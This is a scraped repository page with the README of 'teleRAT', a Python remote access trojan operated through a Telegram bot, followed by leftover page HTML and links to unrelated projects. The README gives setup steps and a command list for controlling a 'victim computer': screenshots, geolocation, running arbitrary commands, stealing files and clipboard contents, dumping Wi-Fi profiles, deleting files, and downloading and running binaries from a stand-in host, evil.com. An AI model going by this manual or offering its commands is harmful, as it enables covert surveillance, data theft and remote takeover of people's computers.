Telegram RAT written in Python

Related tags

Third-party APIs Wrapperspythonmalwareratmalware-researchremote-admin-tool
Overview

teleRAT

Python based RAT that uses Telegram for sending commands and receiving data to and from a victim computer.

Setup.py

  1. Insert your API key into the api variable inside the setup.py script & run it. This will setup your Telegram chat with your created bot with the necessary commands to avoid inserting each command along with the help message.
  • Read here to create your own bot and obtain your API token.
  1. Install necessary requirements: pip install -r requirements.txt
  2. Send a command to your Telegram bot
  3. Run python3 main.py

Available Commands

  • /whoami - returns username. no additional arguments required.
  • /screenshot - takes screenshots. requires the number of screenshots to take (EX: /screenshot 5 <- to take 5 screenshots)
  • /location - returns location info (region, state, zip code, estimated coordinates, timezone, country, ip address)
  • /metadata - returns metadata info about a specified file. requires filepath as an additional argument (EX: /metadata C:\Users\Username\Files\special.java <- will return metadata info about special.java)
  • /execute - executes specified system command. requires 2 additional arguments: the system command and additional arguments to pass to that system command (EX: /execute cmd.exe [/c,ver] or /execute binary.exe none} in order to execute binary.exe with no arguments)
  • /power - allows operator to shutoff, hibernate, or restart computer. requires 1 additional argument: hibernate, pd (to power down), or restart (EX: /power pd <- to power down the victim's computer)
  • /ls - provides operator with directory listing. If no additional argument is provided, it provides directory listing for directory in which malware is. Additional argument of a directory is optional (EX: /ls %APPDATA% <- provides directory listing for APPDATA directory)
  • /delete - deletes a user specified file. Additional argument of filepath is required (EX: /delete C:\Users\Username\Files\temp.txt <- deletes a file named temp.txt)
  • /wreport - provides information regarding the wireless profiles the computer has connected to in the past, the drivers, and a list of wireless interfaces.
  • /remotebinary - download and execute a remote binary. Requires 2 additional arguments: the URL where the binary is and any additional arguments to pass when executing the binary (EX: /remotebinary https://evil.com/file.exe noargs <- execute file.exe with no arguments or /remotebinary https://evil.com/file.exe [-c,-f] <- to execute file.exe with flags c & f)
  • /processes - returns a list of running processes and services
  • /gather - return a specified file. requires 1 additional argument: the filepath (EX: /gather C:\Users\username\important\file.xlsx <- grab and upload file.xlsx to Telegram chat)
  • /report - provides a hardware report & Windows version to operator
  • /playnoise - plays a user specified noise. available list of noises include: asterisk sound (asterisk), exclamation sound (exclamation), exit sound (exit), hand sound (hand), question sound (question), and beep (beep) (EX: /playnoise beep or /playnoise question)
  • /gatherclip - returns data currently copied in the victim's clipboard. requires no additional arguments.
  • /messagebox - will present the victim with a message box. 2 additional arguments are required: caption and title for the window (EX: /messagebox </li> </ul> </article> </div> </div> </div> <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js" type="3463953c43b18c592a02463e-text/javascript"></script> <ins class="adsbygoogle" style="display:block" data-ad-format="autorelaxed" data-ad-client="ca-pub-2693323733590204" data-ad-slot="1585190487"></ins> <script type="3463953c43b18c592a02463e-text/javascript">(adsbygoogle = window.adsbygoogle || []).push({});</script> </div> <div class="col-lg-4 right"> <div id="basic" class="tab-pane fade show active"> <div class="box shadow-sm rounded bg-white mb-3"> <div class="box-title border-bottom p-3"> <h6 class="m-0">Owner</h6> </div> <div class="d-flex align-items-center p-3 job-item-header"> <div class="overflow-hidden mr-2"> <h6 class="font-weight-bold -dark mb-0 text-truncate"> </h6> <div class="small text-gray-500"> </div> </div> <img class="img-fluid ml-auto" style="border-radius: 50%;" src="https://avatars.githubusercontent.com/u/56985822?v=4&s=60" alt=""> </div> <div class="box-body p-3"> <a href="/repo/gitHubRepo/1d8-teleRAT-python-third-party-apis-wrappers" rel="nofollow" target="_blank" class="btn btn-lg btn-block btn-danger mb-3"><i class="fa fa-github" aria-hidden="true"></i> GitHub Repository</a> </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/sixohsix-twitter-python-third-party-apis-wrappers"><h6 class="font-weight-bold ">Python Twitter API</h6></a> <p class="mb-0 text-muted"> Python Twitter Tools The Minimalist Twitter API for Python is a Python API for Twitter, everyone's favorite Web 2.0 Facebook-style status updater for </p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/40615?v=4&s=60" alt="Mike Verdone"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 2.9k <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Jan 03, 2023 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/jasonsaini-KnightHacks-Hackathon-2021--python-third-party-apis-wrappers"><h6 class="font-weight-bold ">DadBot 2.0 is an interactive bot that reflects the personality of a typical dad</h6></a> <p class="mb-0 text-muted"> DadBot 2.0 is an interactive bot that reflects the personality of a typical dad! You can start by running main while all directories are maintained as they are on this GitHub.</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/69808698?v=4&s=60" alt=""> <i class="fa fa-star ml-3" aria-hidden="true"></i> 1 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Dec 04, 2021 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/titoo-dev-python-tononkiramalagasy-api"><h6 class="font-weight-bold ">ETL for tononkira.serasera.org</h6></a> <p class="mb-0 text-muted"> python-tononkiramalagasy-api Api Endpoints: ### get artists - /artists/int:page [page_offset = 20] ### get artist's songs, index was given by </p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/75468986?v=4&s=60" alt="Titosy Manankasina"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 1 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Dec 24, 2021 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/Ts-Bots-BotStatus-Ts-Bot"><h6 class="font-weight-bold ">A telegram bot which can show you the status of telegram bot </h6></a> <p class="mb-0 text-muted"> BotStatus-Ts-Bot An open source telegram Bot Status bot For demo you can check here The status is updated in every 1 hour About Bot This is a Bot stat</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/81805185?v=4&s=60" alt="Ts_Bots"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 8 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Nov 17, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/vikash98k-stackoverflow-search-api-python-third-party-apis-wrappers"><h6 class="font-weight-bold ">Stack overflow search API</h6></a> <p class="mb-0 text-muted"> Stack overflow search API</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/45944283?v=4&s=60" alt="Vikash Karodiya"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 1 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Nov 15, 2021 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/axlkiller-CrashW"><h6 class="font-weight-bold ">A WhatsApp Crashing Tool for Termux</h6></a> <p class="mb-0 text-muted"> CrashW A WhatsApp Crashing Tool For Termux Users Installing : apt update && apt upgrade -y pkg install python3 pkg install git git clone git://gith</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/88760257?v=4&s=60" alt="Gokul Mahato"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 20 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Dec 27, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/cliphd-TTNC"><h6 class="font-weight-bold ">TikTok 4L and 4C checker that doesn't count banned usernames as available</h6></a> <p class="mb-0 text-muted"> TikTok 4L and 4C checker that doesn't count banned usernames as available. Once a username is available, it will send it to your Discord Webhook. </p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/80993711?v=4&s=60" alt="cliphd"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 26 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> May 01, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/AkiraNoHikari-pysauce"><h6 class="font-weight-bold ">Pysauce is a Discord bot which utilizes the SauceNAO API to locate the source of images.</h6></a> <p class="mb-0 text-muted"> Pysauce Pysauce is a Discord bot which utilizes the SauceNAO API to locate the source of images. Use Pysauce has one public instance always running, i</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/38864051?v=4&s=60" alt="Akira"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 2 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Oct 04, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/Sukumar24-GroupManagerBot-python-third-party-apis-wrappers"><h6 class="font-weight-bold "> Telegram Group Manager Bot + Userbot Written In Python Using Pyrogram. </h6></a> <p class="mb-0 text-muted"> Telegram Group Manager Bot + Userbot Written In Python Using PyrogramTelegram Group Manager Bot + Userbot Written In Python Using Pyrogram</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/93417462?v=4&s=60" alt=""> <i class="fa fa-star ml-3" aria-hidden="true"></i> 1 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Nov 11, 2021 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/DaRkSurface-drkdiscord"><h6 class="font-weight-bold ">A Wide AOI tool for discord.</h6></a> <p class="mb-0 text-muted"> drkdiscord - drk#1337 A Wide AOI tool for discord. Installation To Install you have to have python 3.x and pip installed on your system. If you have t</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/74876947?v=4&s=60" alt="Darkest Surface"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 6 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Dec 17, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/GitBolt-solathon"><h6 class="font-weight-bold ">☄️ High performance, easy to use and feature-rich Solana SDK for Python.</h6></a> <p class="mb-0 text-muted"> Solathon is an high performance, easy to use and feature-rich Solana SDK for Python. Easy for beginners, powerful for real world applications.</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/74103155?v=4&s=60" alt="Bolt"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 28 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Oct 10, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/as1605-IITD-Bot"><h6 class="font-weight-bold ">Discord bot to administer IITD Study Servers (unofficial)</h6></a> <p class="mb-0 text-muted"> IITD-Bot Discord bot to administer IITD'20 Acad Server Commands hello to check if bot is online ?help to display this message ?set kerberos to set y</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/72691999?v=4&s=60" alt="Aditya Singh"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 47 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Dec 19, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/monosans-aiopygismeteo"><h6 class="font-weight-bold ">Asynchronous wrapper для Gismeteo.ru.</h6></a> <p class="mb-0 text-muted"> aiopygismeteo Асинхронная обёртка для Gismeteo.ru. Синхронная версия здесь. Установка python -m pip install -U aiopygismeteo Документация https://aiop</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/76561516?v=4&s=60" alt="Almaz"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 6 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Dec 08, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/athallahmaajid-wallpaper-api-python-third-party-apis-wrappers"><h6 class="font-weight-bold ">Wallpaper API from wallpaperscraft.com</h6></a> <p class="mb-0 text-muted"> wallpaper-api Wallpaper API from https://wallpaperscraft.com for API documentation see https://maajid-wallpaper-api.deta.dev/docs How to Run first, cl</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/66192387?v=4&s=60" alt="Athallah Muhammad Maajid"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 2 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Apr 06, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/VincentRPS-discord-io-python-third-party-apis-wrappers"><h6 class="font-weight-bold ">A modern,feature-rich, and async ready API wrapper for Discord written in Python</h6></a> <p class="mb-0 text-muted"> discord.io A modern, easy to use, feature-rich, and async ready API wrapper for Discord written in Python. Key Features Modern Pythonic API using asyn</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/82736662?v=4&s=60" alt="Vincent"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 18 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Jan 02, 2023 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/nerpoc42-Ryuk-python-third-party-apis-wrappers"><h6 class="font-weight-bold ">Univerity-student oriented (lithuanian) discord bot</h6></a> <p class="mb-0 text-muted"> Univerity-student oriented (lithuanian) discord bot</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/58957542?v=4&s=60" alt=""> <i class="fa fa-star ml-3" aria-hidden="true"></i> 3 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Nov 30, 2021 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/Gujal00-ResolveURL"><h6 class="font-weight-bold ">ResolveURL - Fork of UrlResolver by eldorados, tknorris and jsergio123</h6></a> <p class="mb-0 text-muted"> ResolveURL Fork of UrlResolver by eldorados, tknorris and jsergio123 I am in no </p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/17394059?v=4&s=60" alt="gujal"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 60 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Jan 03, 2023 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/python-discord-bot-python-third-party-apis-wrappers"><h6 class="font-weight-bold ">The community bot for the Python Discord community</h6></a> <p class="mb-0 text-muted"> Python Utility Bot This project is a Discord bot specifically for use with the Python Discord server. It provides numerous utilities and other tools t</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/36101493?v=4&s=60" alt="Python Discord"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 998 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Jan 03, 2023 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/Ariz-z-Moderation-By-Pokemon-Bot"><h6 class="font-weight-bold ">Moderation By Pokemon Bot (Discord)</h6></a> <p class="mb-0 text-muted"> Moderation Bot By Pokémon Bot (Discord) Official Moderation Bot for Pokemon Bot functional and based in the Discord Server, the bot is written in Pyth</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/43195493?v=4&s=60" alt="Aakash Manoj Agrawal"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 6 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Jan 04, 2022 </div> </div> <div class="box shadow-sm mb-3 rounded bg-white ads-box"> <div class="p-3 border-bottom"> <a href="/repo/Kataiser-tf2-rich-presence-python-third-party-apis-wrappers"><h6 class="font-weight-bold ">Discord Rich Presence for Team Fortress 2</h6></a> <p class="mb-0 text-muted"> TF2 Rich Presence Discord Rich Presence for Team Fortress 2 Detects current game state, queue info, playtime, and more Configurable, reliable, and per</p> </div> <div class="p-2"> <img class="lazy img-fluid mr-3" style="border-radius: 50%; width: 50px; height: 50px;" data-original="https://avatars.githubusercontent.com/u/14226721?v=4&s=60" alt="Kataiser"> <i class="fa fa-star ml-3" aria-hidden="true"></i> 33 <i class="fa fa-clock-o ml-3" aria-hidden="true"></i> Dec 31, 2022 </div> </div> </div> </div> </div> </div> <footer class="bg-white"> <div class="container"> <div class="copyright"> <div class="logo"> <a href="/"> <img src="/assets/images/logo_pythonrepo.png"> </a> </div> <p>2022.PythonRepo </p> <ul class="social"> <li> <a href="/about">About</a>   </li> <li> <a href="/contact">Contact Us</a>   </li> <li> <a href="/dmca">DMCA</a>   </li> <li> <a href="/disclaimer">Disclaimer</a>   </li> <li> <a href="/privacypolicy">Privacy Policy</a>   </li> </ul> </div> </div> </footer> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js" integrity="sha512-bnIvzh6FU75ZKxp0GXLH9bewza/OIw6dLVh9ICg0gogclmYGguQJWl8U30WpbsGTqbIiAwxTsbe76DErLq5EDQ==" crossorigin="anonymous" type="3463953c43b18c592a02463e-text/javascript"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.5.0/js/bootstrap.bundle.min.js" integrity="sha512-Oy5BruJdE3gP9+LMJ11kC5nErkh3p4Y0GawT1Jrcez4RTDxODf3M/KP3pEsgeOYxWejqy2SPnj+QMpgtvhDciQ==" crossorigin="anonymous" type="3463953c43b18c592a02463e-text/javascript"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/select2/4.0.13/js/select2.min.js" integrity="sha512-2ImtlRlf2VVmiGZsjm9bEyhjGW4dU7B6TNwh/hx/iSByxNENtj3WVE6o/9Lj4TJeVXPi4bnOIMXFIJJAeufa0A==" crossorigin="anonymous" type="3463953c43b18c592a02463e-text/javascript"></script> <script src="/assets/js/custom.js" type="3463953c43b18c592a02463e-text/javascript"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.lazyload/1.9.1/jquery.lazyload.min.js" type="3463953c43b18c592a02463e-text/javascript"></script> <script type="3463953c43b18c592a02463e-text/javascript"> $(function() { $("img.lazy").lazyload({ threshold :180, failurelimit :20, effect : "fadeIn" }); }); </script> <script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/10.5.0/highlight.min.js" type="3463953c43b18c592a02463e-text/javascript"></script> <script type="3463953c43b18c592a02463e-text/javascript"> hljs.initHighlightingOnLoad(); </script> <script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="3463953c43b18c592a02463e-|49" defer=""></script> <script src="/static/js/jquery-3.6.0.min.js" type="text/javascript"></script> <script src="/adview_pic_cpc_cpm_cpa_guanggao_gg_ads_300x250.js?v=1770520250" type="text/javascript"></script> </body> </html>